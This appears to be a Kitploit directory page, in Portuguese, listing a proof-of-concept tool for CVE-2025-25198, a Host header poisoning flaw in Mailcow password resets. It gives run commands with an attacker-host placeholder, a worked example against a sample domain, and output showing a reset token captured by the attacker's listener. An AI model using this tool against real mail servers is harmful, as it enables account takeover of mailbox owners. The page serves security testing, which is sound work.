Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-25198-PoC — PoC para CVE-2025-25198: teste automatizado de envenenamento de cabeçalho Host para Mailcow - ouvinte HTTPS, manipulação automática de cookies/CSRF, captura o primeiro link de redefinição. | Kitploit
Ferramentas/GitHubGitHub/groppoxx/cve-2025-25198-poc
Ataques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubgroppoxx/cve-2025-25198-poc

CVE-2025-25198-PoC

PoC para CVE-2025-25198: teste automatizado de envenenamento de cabeçalho Host para Mailcow - ouvinte HTTPS, manipulação automática de cookies/CSRF, captura o primeiro link de redefinição.

Ver Repositório
201há 3 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

CVE-2025-25198-PoC

Prova de conceito para CVE-2025-25198, um problema de envenenamento de cabeçalho Host que afeta os fluxos de redefinição de senha do Mailcow.

O script inicia um listener HTTPS local na porta 443, obtém automaticamente um token CSRF válido, envia a sequência de redefinição de senha com um cabeçalho Host envenenado e para quando um link de redefinição é recuperado, seja da resposta HTTP ou de um callback ao listener.

O que faz

  1. Inicia um listener HTTPS com um certificado autoassinado.
  2. Cria uma nova sessão de cliente HTTP.
  3. Obtém um token CSRF automaticamente.
  4. Envia o fluxo de redefinição com um cabeçalho Host controlado.
  5. Extrai links de redefinição de respostas e redirecionamentos.
  6. Aguarda um hit do listener se o destino enviar o link fora da banda.
  7. Para no primeiro link de redefinição válido e o exibe de forma limpa.

Requisitos

root@kitploit:~
Python 3.8+
OpenSSL in PATH
sudo/root privileges to bind port 443
Inbound TCP/443 reachable from the target

Instale as dependências:

root@kitploit:~
pip install -r requirements.txt

Início Rápido

Valores entre colchetes angulares são espaços reservados. Substitua pelos seus próprios valores e não inclua os caracteres < ou >.

root@kitploit:~
sudo python3 cve_2025_25198.py \
  --listen-host 0.0.0.0 \
  --base-url <MAILCOW_URL> \
  --username <MAILBOX> \
  --attacker-host <ATTACKER_HOST> \
  --http2

Espaços Reservados

root@kitploit:~
<MAILCOW_URL>    # Target Mailcow base URL. Example: https://mail.example.com
<MAILBOX>        # Mailbox/user passed to the reset form. Usually an email address.
<ATTACKER_HOST>  # IP or DNS name that the target can reach on TCP/443.

Exemplo Completo

root@kitploit:~
sudo python3 cve_2025_25198.py \
  --listen-host 0.0.0.0 \
  --base-url https://mail.cows.com \
  --username [email protected] \
  --attacker-host 10.10.13.12 \
  --http2

Exemplo de saída:

root@kitploit:~
[2026-05-17T18:30:12Z] [+] HTTPS listener on https://0.0.0.0:443
[2026-05-17T18:30:13Z] [+] Auto CSRF: 0123456789abcdef...
[2026-05-17T18:30:13Z] [>] Sending sequence with poisoned Host
[2026-05-17T18:30:14Z] [HIT] GET /reset-password?token=AAAA-BBBB-CCCC-DDDD ← 10.10.13.12 [200]

╔════════════════════════════════════════════════════════════════════════════════╗
║  RESET LINK FOUND!  (listener)                                                 ║
╟════════════════════════════════════════════════════════════════════════════════╢
║  https://mail.cows.com/reset-password?token=AAAA-BBBB-CCCC-DDDD                ║
║  Target: mail.cows.com                                                         ║
╚════════════════════════════════════════════════════════════════════════════════╝

Demonstração

asciicast

Flags Opcionais

root@kitploit:~
--http2
   Use HTTP/2 via httpx. Recommended for best parity with modern browsers.

--interval <seconds>
   Seconds between attempts and listener wait windows. Default: 8

--max-attempts <N>
   Stop after N attempts. Default: 0, which means retry indefinitely.

--cookie '<pairs>'
   Seed the client cookie jar manually.
   Example: --cookie 'PHPSESSID=abcdef123456; another=value'

--csrf <TOKEN>
   Use a known CSRF token instead of auto-discovery.

--only-final
   Hide progress logs and print only the final reset-link banner.

Notas

  • O listener sempre vincula à porta 443.
  • No Linux/macOS, vincular a porta 443 requer sudo ou root.
  • O destino deve conseguir acessar https://<ATTACKER_HOST>/.
  • Se um link de redefinição for encontrado em uma resposta HTTP, o script sai imediatamente.
  • Se nenhum link for encontrado na resposta, o script aguarda um callback para o listener HTTPS.
  • Se nenhum link for recuperado, a sequência tenta novamente a cada 8 segundos por padrão.
  • server.pem e server.key são gerados automaticamente se estiverem ausentes.

Legal

Este PoC é destinado a testes de segurança autorizados, ambientes de laboratório e verificação de vulnerabilidades. Não utilize contra sistemas sem permissão explícita.

Baixar ferramenta